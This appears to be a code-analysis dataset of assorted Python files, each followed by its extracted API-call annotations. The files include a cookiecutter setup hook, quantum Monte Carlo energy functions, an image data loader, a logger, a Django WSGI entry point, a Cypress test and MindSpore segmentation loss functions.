((3259, 3312), 'numpy.random.randint', 'np.random.randint', (['(0)', '(8192)'], {'size': '(1100)', 'dtype': 'np.int32'}), '(0, 8192, size=1100, dtype=np.int32)\n', (3276, 3312), True, 'import numpy as np\n'), ((3518, 3549), 'numpy.all', 'np.all', (['(received == data[:1024])'], {}), '(received == data[:1024])\n', (3524, 3549), True, 'import numpy as np\n'), ((3630, 3662), 'numpy.all', 'np.all', (['(received == data[-rest:])'], {}), '(received == data[-rest:])\n', (3636, 3662), True, 'import numpy as np\n'), ((737, 778), 'pytest.raises', 'pytest.raises', (['ImportError'], {'match': '"""nxsdk"""'}), "(ImportError, match='nxsdk')\n", (750, 778), False, 'import pytest\n'), ((788, 846), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), '()\n', (844, 846), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((1148, 1166), 'pytest.warns', 'pytest.warns', (['None'], {}), '(None)\n', (1160, 1166), False, 'import pytest\n'), ((1186, 1244), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), '()\n', (1242, 1244), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((1520, 1545), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (1532, 1545), False, 'import pytest\n'), ((1555, 1613), 'nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version', 'hardware_interface.HardwareInterface.check_nxsdk_version', ([], {}), '()\n', (1611, 1613), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), ((2073, 2129), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""unrecognized pop_type"""'}), "(ValueError, match='unrecognized pop_type')\n", (2086, 2129), False, 'import pytest\n'), ((2139, 2157), 'nengo_loihi.hardware.builder.build_board', 'build_board', (['board'], {}), '(board)\n', (2150, 2157), False, 'from nengo_loihi.hardware.builder import build_board\n'), ((2664, 2720), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""unrecognized pop_type"""'}), "(ValueError, match='unrecognized pop_type')\n", (2677, 2720), False, 'import pytest\n'), ((2730, 2748), 'nengo_loihi.hardware.builder.build_board', 'build_board', (['board'], {}), '(board)\n', (2741, 2748), False, 'from nengo_loihi.hardware.builder import build_board\n'), ((3729, 3784), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""less than expected"""'}), "(RuntimeError, match='less than expected')\n", (3742, 3784), False, 'import pytest\n'), ((3920, 3982), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""shutdown signal from chip"""'}), "(RuntimeError, match='shutdown signal from chip')\n", (3933, 3982), False, 'import pytest\n'), ((4134, 4189), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {'match': '"""less than expected"""'}), "(RuntimeError, match='less than expected')\n", (4147, 4189), False, 'import pytest\n'), ((4329, 4344), 'nengo.Network', 'nengo.Network', ([], {}), '()\n', (4342, 4344), False, 'import nengo\n'), ((4361, 4381), 'nengo.Ensemble', 'nengo.Ensemble', (['(2)', '(1)'], {}), '(2, 1)\n', (4375, 4381), False, 'import nengo\n'), ((4515, 4573), 'pytest.raises', 'pytest.raises', (['SimulationError'], {'match': '"""cannot be reopened"""'}), "(SimulationError, match='cannot be reopened')\n", (4528, 4573), False, 'import pytest\n'), ((4814, 4877), 'pytest.raises', 'pytest.raises', (['SimulationError'], {'match': '"""Mock failure to connect"""'}), "(SimulationError, match='Mock failure to connect')\n", (4827, 4877), False, 'import pytest\n'), ((5073, 5097), 'nengo.Network', 'nengo.Network', ([], {'seed': 'seed'}), '(seed=seed)\n', (5086, 5097), False, 'import nengo\n'), ((5120, 5142), 'nengo.Ensemble', 'nengo.Ensemble', (['(100)', '(1)'], {}), '(100, 1)\n', (5134, 5142), False, 'import nengo\n'), ((5190, 5205), 'nengo.Node', 'nengo.Node', (['(0.5)'], {}), '(0.5)\n', (5200, 5205), False, 'import nengo\n'), ((5218, 5257), 'nengo.Connection', 'nengo.Connection', (['stim', 'a'], {'synapse': 'None'}), '(stim, a, synapse=None)\n', (5234, 5257), False, 'import nengo\n'), ((5323, 5373), 'pytest.warns', 'pytest.warns', (['UserWarning'], {'match': '"""Too many spikes"""'}), "(UserWarning, match='Too many spikes')\n", (5335, 5373), False, 'import pytest\n')]
|
import shutil
import subprocess
import json
import os
# CLEANUP
MANIFEST_FILE = "manifest.json"
def cleanup_disabled_features():
print("⚒ Cleaning up...")
with open(MANIFEST_FILE) as manifest_file:
manifest = json.load(manifest_file)
for feature in manifest["features"]:
if not feature["enabled"]:
for resource in feature["resources"]:
remove_resource(resource)
remove_resource(MANIFEST_FILE)
print("✔ Cleanup complete")
def remove_resource(resource):
if os.path.isfile(resource):
os.remove(resource)
elif os.path.isdir(resource):
shutil.rmtree(resource)
# ENVIRONMENT SETUP
def build_environment():
print("⚒ Building the environment...")
try:
create_virtual_environment()
install_dependencies()
print("✔ The environment is ready")
except subprocess.CalledProcessError:
print(
"❌ The environment could not be built, you can do it later "
"using the included command `make build-env`."
)
def create_virtual_environment():
subprocess.check_call(["python3", "-m", "venv", ".venv"])
def install_dependencies():
subprocess.check_call(
["poetry", "run", "pip", "install", "--upgrade", "pip"]
)
subprocess.check_call(["poetry", "run", "poetry", "install"])
# GIT INITIALIZATION
def execute_git_initialization():
print("⚒ Initializing git repository...")
try:
initialize_git_repository()
initial_git_commit()
rename_git_branch()
create_git_stable_branch()
print("✔ git initialization complete")
except subprocess.CalledProcessError:
print("❌ The git repository could not be correctly initialized.")
def initialize_git_repository():
subprocess.check_call(["git", "init"])
def initial_git_commit():
subprocess.check_call(["git", "add", "."])
subprocess.check_call(["git", "commit", "-m", "'Initial commit'"])
def rename_git_branch():
subprocess.check_call(["git", "branch", "-M", "{{ cookiecutter.git_main_branch }}"])
def create_git_stable_branch():
subprocess.check_call(["git", "branch", "stable"])
if __name__ == "__main__":
cleanup_disabled_features()
build_environment()
execute_git_initialization()
|
[
"os.remove",
"json.load",
"os.path.isdir",
"os.path.isfile",
"shutil.rmtree",
"subprocess.check_call"
] |
[((529, 553), 'os.path.isfile', 'os.path.isfile', (['resource'], {}), '(resource)\n', (543, 553), False, 'import os\n'), ((1100, 1157), 'subprocess.check_call', 'subprocess.check_call', (["['python3', '-m', 'venv', '.venv']"], {}), "(['python3', '-m', 'venv', '.venv'])\n", (1121, 1157), False, 'import subprocess\n'), ((1192, 1270), 'subprocess.check_call', 'subprocess.check_call', (["['poetry', 'run', 'pip', 'install', '--upgrade', 'pip']"], {}), "(['poetry', 'run', 'pip', 'install', '--upgrade', 'pip'])\n", (1213, 1270), False, 'import subprocess\n'), ((1289, 1350), 'subprocess.check_call', 'subprocess.check_call', (["['poetry', 'run', 'poetry', 'install']"], {}), "(['poetry', 'run', 'poetry', 'install'])\n", (1310, 1350), False, 'import subprocess\n'), ((1794, 1832), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'init']"], {}), "(['git', 'init'])\n", (1815, 1832), False, 'import subprocess\n'), ((1865, 1907), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'add', '.']"], {}), "(['git', 'add', '.'])\n", (1886, 1907), False, 'import subprocess\n'), ((1912, 1978), 'subprocess.check_call', 'subprocess.check_call', (['[\'git\', \'commit\', \'-m\', "\'Initial commit\'"]'], {}), '([\'git\', \'commit\', \'-m\', "\'Initial commit\'"])\n', (1933, 1978), False, 'import subprocess\n'), ((2010, 2098), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'branch', '-M', '{{ cookiecutter.git_main_branch }}']"], {}), "(['git', 'branch', '-M',\n '{{ cookiecutter.git_main_branch }}'])\n", (2031, 2098), False, 'import subprocess\n'), ((2133, 2183), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'branch', 'stable']"], {}), "(['git', 'branch', 'stable'])\n", (2154, 2183), False, 'import subprocess\n'), ((229, 253), 'json.load', 'json.load', (['manifest_file'], {}), '(manifest_file)\n', (238, 253), False, 'import json\n'), ((563, 582), 'os.remove', 'os.remove', (['resource'], {}), '(resource)\n', (572, 582), False, 'import os\n'), ((592, 615), 'os.path.isdir', 'os.path.isdir', (['resource'], {}), '(resource)\n', (605, 615), False, 'import os\n'), ((625, 648), 'shutil.rmtree', 'shutil.rmtree', (['resource'], {}), '(resource)\n', (638, 648), False, 'import shutil\n')]
|
#import numpy as np
import jax.numpy as jnp
import pyqmc.eval_ecp as eval_ecp
from pyqmc.distance import RawDistance
def ee_energy(configs):
ne = configs.shape[1]
if ne == 1:
return jnp.zeros(configs.shape[0])
ee = jnp.zeros(configs.shape[0])
ee, ij = RawDistance().dist_matrix(configs)
ee = jnp.linalg.norm(ee, axis=2)
return jnp.sum(1.0 / ee, axis=1)
def ei_energy(mol, configs):
ei = 0.0
for c, coord in zip(mol.atom_charges(), mol.atom_coords()):
delta = configs - coord[jnp.newaxis, jnp.newaxis, :]
deltar = jnp.sqrt(jnp.sum(delta ** 2, axis=2))
ei += -c * jnp.sum(1.0 / deltar, axis=1)
return ei
def ii_energy(mol):
ei = 0.0
d = RawDistance()
rij, ij = d.dist_matrix(mol.atom_coords()[jnp.newaxis, :, :])
if len(ij) == 0:
return jnp.array([0.0])
rij = jnp.linalg.norm(rij, axis=2)[0, :]
iitot = 0
c = mol.atom_charges()
for (i, j), r in zip(ij, rij):
iitot += c[i] * c[j] / r
return iitot
def get_ecp(mol, configs, wf, threshold):
return eval_ecp.ecp(mol, configs, wf, threshold)
def kinetic(configs, wf):
nconf, nelec, ndim = configs.shape
ke = jnp.zeros(nconf)
ke += -0.5 * jnp.real(wf["laplacian"](configs))
return ke
def energy(mol, configs, wf, threshold):
"""Compute the local energy of a set of configurations.
Args:
mol: A pyscf-like 'Mole' object. nelec, atom_charges(), atom_coords(), and ._ecp are used.
configs: a nconfiguration x nelectron x 3 numpy array
wf: A Wavefunction-like object. Functions used include recompute(), lapacian(), and testvalue()
Returns:
a dictionary with energy components ke, ee, ei, and total
"""
ee = ee_energy(configs)
ei = ei_energy(mol, configs)
ecp_val = get_ecp(mol, configs, wf, threshold)
ii = ii_energy(mol)
ke = kinetic(configs, wf)
# print(ke,ee,ei,ii)
return {
"ke": ke,
"ee": ee,
"ei": ei,
"ecp": ecp_val,
"total": ke + ee + ei + ecp_val + ii,
}
|
[
"jax.numpy.array",
"jax.numpy.sum",
"jax.numpy.linalg.norm",
"pyqmc.distance.RawDistance",
"jax.numpy.zeros",
"pyqmc.eval_ecp.ecp"
] |
[((237, 264), 'jax.numpy.zeros', 'jnp.zeros', (['configs.shape[0]'], {}), '(configs.shape[0])\n', (246, 264), True, 'import jax.numpy as jnp\n'), ((322, 349), 'jax.numpy.linalg.norm', 'jnp.linalg.norm', (['ee'], {'axis': '(2)'}), '(ee, axis=2)\n', (337, 349), True, 'import jax.numpy as jnp\n'), ((361, 386), 'jax.numpy.sum', 'jnp.sum', (['(1.0 / ee)'], {'axis': '(1)'}), '(1.0 / ee, axis=1)\n', (368, 386), True, 'import jax.numpy as jnp\n'), ((717, 730), 'pyqmc.distance.RawDistance', 'RawDistance', ([], {}), '()\n', (728, 730), False, 'from pyqmc.distance import RawDistance\n'), ((1076, 1117), 'pyqmc.eval_ecp.ecp', 'eval_ecp.ecp', (['mol', 'configs', 'wf', 'threshold'], {}), '(mol, configs, wf, threshold)\n', (1088, 1117), True, 'import pyqmc.eval_ecp as eval_ecp\n'), ((1194, 1210), 'jax.numpy.zeros', 'jnp.zeros', (['nconf'], {}), '(nconf)\n', (1203, 1210), True, 'import jax.numpy as jnp\n'), ((200, 227), 'jax.numpy.zeros', 'jnp.zeros', (['configs.shape[0]'], {}), '(configs.shape[0])\n', (209, 227), True, 'import jax.numpy as jnp\n'), ((833, 849), 'jax.numpy.array', 'jnp.array', (['[0.0]'], {}), '([0.0])\n', (842, 849), True, 'import jax.numpy as jnp\n'), ((860, 888), 'jax.numpy.linalg.norm', 'jnp.linalg.norm', (['rij'], {'axis': '(2)'}), '(rij, axis=2)\n', (875, 888), True, 'import jax.numpy as jnp\n'), ((278, 291), 'pyqmc.distance.RawDistance', 'RawDistance', ([], {}), '()\n', (289, 291), False, 'from pyqmc.distance import RawDistance\n'), ((582, 609), 'jax.numpy.sum', 'jnp.sum', (['(delta ** 2)'], {'axis': '(2)'}), '(delta ** 2, axis=2)\n', (589, 609), True, 'import jax.numpy as jnp\n'), ((630, 659), 'jax.numpy.sum', 'jnp.sum', (['(1.0 / deltar)'], {'axis': '(1)'}), '(1.0 / deltar, axis=1)\n', (637, 659), True, 'import jax.numpy as jnp\n')]
|
from app.models import DataSource, DataSourcePoll
def fetch_all_data_sources():
try:
all_data_sources = DataSource.query.all()
except Exception:
print("error fetching data sources; table likely empty")
all_data_sources = []
return all_data_sources
def fetch_all_data_source_polls():
try:
all_data_source_polls = DataSourcePoll.query.all()
except Exception:
print("error fetching data source polls; table likely empty")
all_data_source_polls = []
return all_data_source_polls
|
[
"app.models.DataSourcePoll.query.all",
"app.models.DataSource.query.all"
] |
[((118, 140), 'app.models.DataSource.query.all', 'DataSource.query.all', ([], {}), '()\n', (138, 140), False, 'from app.models import DataSource, DataSourcePoll\n'), ((364, 390), 'app.models.DataSourcePoll.query.all', 'DataSourcePoll.query.all', ([], {}), '()\n', (388, 390), False, 'from app.models import DataSource, DataSourcePoll\n')]
|
import os
import numpy as np
# from skimage.io import imread
import cv2
import copy
from skimage.transform import resize
def load_data_siamese(x_size,y_size,data_path,label_path,image_s_path,uncentain_path,validation_name,test_name):
tmp = np.loadtxt(label_path, dtype=np.str, delimiter=",")
# delete one image because we don't have the jpg image, 8252 is the position of this item and 1 is related to the title
tmp = np.delete(tmp,8252+1, axis = 0)
ran = tmp[:,0]
lr = tmp[:,1]
tracking = tmp[:,2]
tmp1=tmp[:,3]
ran = ran[1:len(ran)]
lr = lr[1:len(lr)]
tracking = tracking[1:len(tracking)]
tmp1=tmp1[1:len(tmp1)]
#generate ran and tracking numer for image with ending -s
tmp_s = np.loadtxt(image_s_path, dtype=np.str, delimiter=",")
ran_s = tmp_s[:,1]
tracking_s = tmp_s[:,2]
ran_s = ran_s[1:len(ran_s)]
tracking_s = tracking_s[1:len(tracking_s)]
#generate ran and tracking numer for image with uncentain label
tmp_un = np.loadtxt(uncentain_path, dtype=np.str, delimiter=",")
ran_un = tmp_un[:,0]
tracking_un = tmp_un[:,1]
ran_un = ran_un[1:len(ran_un)]
tracking_un = tracking_un[1:len(tracking_un)]
# x_size = 331
# y_size = 331
val_images1 = np.ndarray((len(validation_name)*20, x_size, y_size,3))
val_images2 = np.ndarray((len(validation_name)*20, x_size, y_size,3))
# val_images = []
val_labels = []
le = 0
for i in range(len(validation_name)):
ind = np.argwhere(ran==validation_name[i][0])
kk = 0
for j in range(len(ind)):
if lr[int(ind[j])] == validation_name[i][1]:
data_paths = os.path.join(data_path, (ran[int(ind[j])] + '-'+ tracking[int(ind[j])] + '.jpg'))
IM = cv2.imread(data_paths)
if kk == 0:
val_images_base = cv2.resize(IM, (x_size, y_size))
gt = tmp1[int(ind[j])]
kk =1
else:
val_images1[le] = val_images_base
val_images2[le] = cv2.resize(IM, (x_size, y_size))
le += 1
if gt == tmp1[int(ind[j])]:
val_labels = np.append(val_labels,1)
else:
val_labels = np.append(val_labels,0)
# # take the second image as the ground truth
# val_labels = np.append(val_labels,tmp1[int(ind[j])])
# continue
val_images1 = val_images1[0:le,:,:,:]
val_images2 = val_images2[0:le,:,:,:]
val_images = [val_images1,val_images2]
test_images1 = np.ndarray((len(test_name)*20, x_size, y_size,3))
test_images2 = np.ndarray((len(test_name)*20, x_size, y_size,3))
#test_images = []
test_labels = []
le = 0
ind_start = []
ll_index = 0
for i in range(len(test_name)):
ind = np.argwhere(ran==test_name[i][0])
kk = 0
for j in range(len(ind)):
if lr[int(ind[j])] == test_name[i][1]:
data_paths = os.path.join(data_path, (ran[int(ind[j])] + '-'+ tracking[int(ind[j])] + '.jpg'))
IM = cv2.imread(data_paths)
if kk ==0:
test_images_base = cv2.resize(IM, (x_size, y_size))
gt = tmp1[int(ind[j])]
kk = 1
ind_start = np.append(ind_start,ll_index)
else:
test_images1[le] = test_images_base
test_images2[le] = cv2.resize(IM, (x_size, y_size))
le += 1
if gt == tmp1[int(ind[j])]:
test_labels = np.append(test_labels,1)
else:
test_labels = np.append(test_labels,0)
ll_index += 1
# # take the second image as the ground truth
# test_labels = np.append(test_labels,tmp1[int(ind[j])])
# continue
test_images1 = test_images1[0:le,:,:,:]
test_images2 = test_images2[0:le,:,:,:]
test_images =[test_images1,test_images2]
# test_images_s = np.ndarray((len(test_name)*10, x_size, y_size,3))
# #test_images = []
# test_labels_s = []
# le = 0
# for i in range(len(test_name)):
# ind = np.argwhere(ran==test_name[i][0])
# ind_s = np.argwhere(ran_s==test_name[i][0])
# for j in range(len(ind)):
# if lr[int(ind[j])] == test_name[i][1] and len(np.argwhere(tracking_s[ind_s]==tracking[int(ind[j])])) != 0:
# data_paths = os.path.join(data_path, (ran[int(ind[j])] + '-'+ tracking[int(ind[j])] + '.jpg'))
# IM = cv2.imread(data_paths)
# test_images_s[le] = cv2.resize(IM, (x_size, y_size))
# # test_images_s[le] = resize(IM, (x_size, y_size, 3))
# # test_images_s[le] = IM
# #test_images = np.append(test_images,IM)
# le += 1
# test_labels_s = np.append(test_labels_s,tmp1[int(ind[j])])
# # continue
# test_images_s = test_images_s[0:le,:,:,:]
# test_images_un = np.ndarray((len(test_name)*10, x_size, y_size,3))
# #test_images = []
# test_labels_un = []
# le = 0
# for i in range(len(test_name)):
# ind = np.argwhere(ran==test_name[i][0])
# ind_un = np.argwhere(ran_un==test_name[i][0])
# for j in range(len(ind)):
# if lr[int(ind[j])] == test_name[i][1] and len(np.argwhere(tracking_un[ind_un]==tracking[int(ind[j])])) != 0:
# data_paths = os.path.join(data_path, (ran[int(ind[j])] + '-'+ tracking[int(ind[j])] + '.jpg'))
# IM = cv2.imread(data_paths)
# test_images_un[le] = cv2.resize(IM, (x_size, y_size))
# # test_images_un[le] = resize(IM, (x_size, y_size, 3))
# # test_images_un[le] = IM
# #test_images = np.append(test_images,IM)
# le += 1
# test_labels_un = np.append(test_labels_un,tmp1[int(ind[j])])
# # continue
# test_images_un = test_images_un[0:le,:,:,:]
# return val_labels, test_labels
# return val_images,val_labels, test_images,test_labels, test_images_s, test_labels_s, test_images_un, test_labels_un
return val_images,val_labels, test_images,test_labels,ind_start
|
[
"cv2.imread",
"numpy.append",
"numpy.loadtxt",
"numpy.argwhere",
"numpy.delete",
"cv2.resize"
] |
[((245, 296), 'numpy.loadtxt', 'np.loadtxt', (['label_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(label_path, dtype=np.str, delimiter=',')\n", (255, 296), True, 'import numpy as np\n'), ((431, 463), 'numpy.delete', 'np.delete', (['tmp', '(8252 + 1)'], {'axis': '(0)'}), '(tmp, 8252 + 1, axis=0)\n', (440, 463), True, 'import numpy as np\n'), ((739, 792), 'numpy.loadtxt', 'np.loadtxt', (['image_s_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(image_s_path, dtype=np.str, delimiter=',')\n", (749, 792), True, 'import numpy as np\n'), ((1010, 1065), 'numpy.loadtxt', 'np.loadtxt', (['uncentain_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(uncentain_path, dtype=np.str, delimiter=',')\n", (1020, 1065), True, 'import numpy as np\n'), ((1533, 1574), 'numpy.argwhere', 'np.argwhere', (['(ran == validation_name[i][0])'], {}), '(ran == validation_name[i][0])\n', (1544, 1574), True, 'import numpy as np\n'), ((2990, 3025), 'numpy.argwhere', 'np.argwhere', (['(ran == test_name[i][0])'], {}), '(ran == test_name[i][0])\n', (3001, 3025), True, 'import numpy as np\n'), ((1811, 1833), 'cv2.imread', 'cv2.imread', (['data_paths'], {}), '(data_paths)\n', (1821, 1833), False, 'import cv2\n'), ((3256, 3278), 'cv2.imread', 'cv2.imread', (['data_paths'], {}), '(data_paths)\n', (3266, 3278), False, 'import cv2\n'), ((1900, 1932), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (1910, 1932), False, 'import cv2\n'), ((2116, 2148), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (2126, 2148), False, 'import cv2\n'), ((3345, 3377), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (3355, 3377), False, 'import cv2\n'), ((3480, 3510), 'numpy.append', 'np.append', (['ind_start', 'll_index'], {}), '(ind_start, ll_index)\n', (3489, 3510), True, 'import numpy as np\n'), ((3627, 3659), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (3637, 3659), False, 'import cv2\n'), ((2262, 2286), 'numpy.append', 'np.append', (['val_labels', '(1)'], {}), '(val_labels, 1)\n', (2271, 2286), True, 'import numpy as np\n'), ((2349, 2373), 'numpy.append', 'np.append', (['val_labels', '(0)'], {}), '(val_labels, 0)\n', (2358, 2373), True, 'import numpy as np\n'), ((3774, 3799), 'numpy.append', 'np.append', (['test_labels', '(1)'], {}), '(test_labels, 1)\n', (3783, 3799), True, 'import numpy as np\n'), ((3863, 3888), 'numpy.append', 'np.append', (['test_labels', '(0)'], {}), '(test_labels, 0)\n', (3872, 3888), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Simple logging class
Released under the MIT license
Copyright (c) 2012, <NAME>
@category misc
@version $Id: 1.7.0, 2016-08-22 14:53:29 ACST $;
@author <NAME>
@license http://opensource.org/licenses/MIT
"""
import logging
import os
import sys
class Logger(object):
def __init__(self, name, debug, silent):
self.silent = silent
frmt = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s',
"%Y-%m-%d %H:%M:%S"
)
if debug:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
self.createhandlers(frmt, name, loglevel)
def __del__(self):
if not self.silent:
self.log.removeHandler(self.sh)
self.log.removeHandler(self.fh)
self.log = None
def createhandlers(self, frmt, name, loglevel):
self.log = logging.getLogger(name)
self.log.setLevel(loglevel)
if not self.silent:
self.sh = logging.StreamHandler(sys.stdout)
self.sh.setLevel(loglevel)
self.sh.setFormatter(frmt)
self.log.addHandler(self.sh)
DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
self.fh = logging.FileHandler('%s/autorippr.log' % DIR)
self.fh.setLevel(loglevel)
self.fh.setFormatter(frmt)
self.log.addHandler(self.fh)
def debug(self, msg):
self.log.debug(msg)
def info(self, msg):
self.log.info(msg)
def warn(self, msg):
self.log.warn(msg)
def error(self, msg):
self.log.error(msg)
def critical(self, msg):
self.log.critical(msg)
|
[
"os.path.abspath",
"logging.FileHandler",
"logging.StreamHandler",
"logging.Formatter",
"logging.getLogger"
] |
[((401, 499), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (418, 499), False, 'import logging\n'), ((919, 942), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (936, 942), False, 'import logging\n'), ((1276, 1321), 'logging.FileHandler', 'logging.FileHandler', (["('%s/autorippr.log' % DIR)"], {}), "('%s/autorippr.log' % DIR)\n", (1295, 1321), False, 'import logging\n'), ((1030, 1063), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (1051, 1063), False, 'import logging\n'), ((1230, 1255), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1245, 1255), False, 'import os\n')]
|
import os
import signal
import sys
import traceback
import time
from django.core.wsgi import get_wsgi_application
#from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "RiverFlows.settings")
application = get_wsgi_application()
#application = DjangoWhiteNoise(application)
|
[
"django.core.wsgi.get_wsgi_application",
"os.environ.setdefault"
] |
[((164, 234), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""RiverFlows.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'RiverFlows.settings')\n", (185, 234), False, 'import os\n'), ((250, 272), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (270, 272), False, 'from django.core.wsgi import get_wsgi_application\n')]
|
import pytest
import subprocess
from tests.utils import ingest_file_via_rest
from tests.utils import delete_urns_from_file
@pytest.fixture(scope="module", autouse=True)
def ingest_cleanup_data():
print("ingesting test data")
ingest_file_via_rest("tests/cypress/data.json")
yield
print("removing test data")
delete_urns_from_file("tests/cypress/data.json")
def test_run_cypress(frontend_session, wait_for_healthchecks):
command = f"npx cypress run"
print('starting?')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd="tests/cypress")
stdout = proc.stdout.read()
stderr = proc.stderr.read()
return_code = proc.wait()
print(stdout.decode("utf-8"))
print('stderr output:')
print(stderr.decode("utf-8"))
print('return code', return_code)
assert(return_code == 0)
|
[
"tests.utils.ingest_file_via_rest",
"pytest.fixture",
"subprocess.Popen",
"tests.utils.delete_urns_from_file"
] |
[((127, 171), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""', 'autouse': '(True)'}), "(scope='module', autouse=True)\n", (141, 171), False, 'import pytest\n'), ((236, 283), 'tests.utils.ingest_file_via_rest', 'ingest_file_via_rest', (['"""tests/cypress/data.json"""'], {}), "('tests/cypress/data.json')\n", (256, 283), False, 'from tests.utils import ingest_file_via_rest\n'), ((330, 378), 'tests.utils.delete_urns_from_file', 'delete_urns_from_file', (['"""tests/cypress/data.json"""'], {}), "('tests/cypress/data.json')\n", (351, 378), False, 'from tests.utils import delete_urns_from_file\n'), ((511, 622), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'cwd': '"""tests/cypress"""'}), "(command, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, cwd='tests/cypress')\n", (527, 622), False, 'import subprocess\n')]
|
from os.path import dirname, join
import glob
from pathlib import Path
modules = glob.glob(join(dirname(__file__), '**/*.py'), recursive=True)
# __all__ = [basename(f)[:-3] for f in modules if isfile(f) and not f.startswith('_')]
paths = [Path(x) for x in modules]
__all__ = [
f'{p.parent.name}.{p.stem}' for p in paths
if p.is_file() and not p.name.startswith('_') and p.parent.name != 'examples']
|
[
"pathlib.Path",
"os.path.dirname"
] |
[((240, 247), 'pathlib.Path', 'Path', (['x'], {}), '(x)\n', (244, 247), False, 'from pathlib import Path\n'), ((97, 114), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (104, 114), False, 'from os.path import dirname, join\n')]
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import mindspore
import mindspore.nn as nn
class dice_bce_loss(nn.LossBase):
def __init__(self, batch=True, reduction="mean"):
super(dice_bce_loss, self).__init__(reduction)
self.batch = batch
self.bce_loss = nn.BCELoss(reduction='mean')
self.sum = mindspore.ops.ReduceSum(keep_dims=False)
def soft_dice_coeff(self, y_true, y_pred):
smooth = 0.0 # may change
if self.batch:
i = self.sum(y_true)
j = self.sum(y_pred)
intersection = self.sum(y_true * y_pred)
else:
i = y_true.sum(1).sum(1).sum(1)
j = y_pred.sum(1).sum(1).sum(1)
intersection = (y_true * y_pred).sum(1).sum(1).sum(1)
score = (2. * intersection + smooth) / (i + j + smooth)
return score.mean()
def soft_dice_loss(self, y_true, y_pred):
loss = 1 - self.soft_dice_coeff(y_true, y_pred)
return loss
def construct(self, predict, target):
a = self.bce_loss(predict, target)
b = self.soft_dice_loss(target, predict)
return a + b
class iou_bce_loss(nn.LossBase):
def __init__(self, batch=True, reduction="mean"):
super(iou_bce_loss, self).__init__(reduction)
self.batch = batch
self.bce_loss = nn.BCELoss(reduction='mean')
self.sum = mindspore.ops.ReduceSum(keep_dims=False)
def soft_dice_coeff(self, y_true, y_pred):
smooth = 0.0 # may change
if self.batch:
i = self.sum(y_true)
j = self.sum(y_pred)
intersection = self.sum(y_true * y_pred)
else:
i = y_true.sum(1).sum(1).sum(1)
j = y_pred.sum(1).sum(1).sum(1)
intersection = (y_true * y_pred).sum(1).sum(1).sum(1)
score = (intersection + smooth) / (i + j - intersection + smooth) # iou
return score.mean()
def soft_dice_loss(self, y_true, y_pred):
loss = 1 - self.soft_dice_coeff(y_true, y_pred)
return loss
def construct(self, predict, target):
a = self.bce_loss(predict, target)
b = self.soft_dice_loss(target, predict)
return a + b
|
[
"mindspore.ops.ReduceSum",
"mindspore.nn.BCELoss"
] |
